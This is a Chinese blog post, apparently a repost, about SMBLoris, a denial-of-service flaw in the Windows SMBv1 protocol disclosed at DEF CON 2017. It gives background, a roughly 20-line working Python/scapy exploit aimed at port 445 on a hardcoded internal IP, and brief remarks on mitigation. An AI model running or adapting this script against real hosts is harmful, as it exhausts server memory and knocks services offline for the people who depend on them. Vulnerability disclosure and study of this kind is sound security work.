SMBLoris windows拒绝服务漏洞

在美国拉斯维加斯举行的2017年度DEF CON黑客大会上,安全研究人员公布了Windows系统上的一个长达20年没有发现的漏洞,该漏洞名为“SMBLoris”,黑客可以轻松的使用简短的20行代码利用该漏洞即可发起DoS攻击导致系统内存资源耗尽,该漏洞影响Windows 2000及以上系统的SMBv1协议。 

from scapy.all import *
import sys
p0 = int(sys.argv[1])
conf.L3socket
conf.L3socket=L3RawSocket

i = IP()
i.dst = "192.168.2.3"
t = TCP()
t.dport = 445

for p in range(p0,p0+700):
    print p
    t.sport = p
    t.flags = "S"

    r = sr1(i/t)
    rt = r[TCP]
    t.ack = rt.seq + 1
    t.seq = rt.ack
    t.flags = "A"
    sbss = '\x00\x01\xff\xff'
    send(i/t/sbss)

以上脚本必须在linux运行,不支持win和unix系列系统。

需要注意的是,企业内网的域环境是依赖于smb协议的,文件共享和打印机服务使得漏洞修复建议上的“关闭445端口”很难落地。

国内某公司提供了一键修复的处理方法,实质也是在注册表中关闭445端口。

参考链接:

https://www.youtube.com/watch?v=Y77er0gzQqA 油管演示过程

以漏洞名命名的域名:https://smbloris.com/

转载于:https://www.cnblogs.com/nayu/p/7282743.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值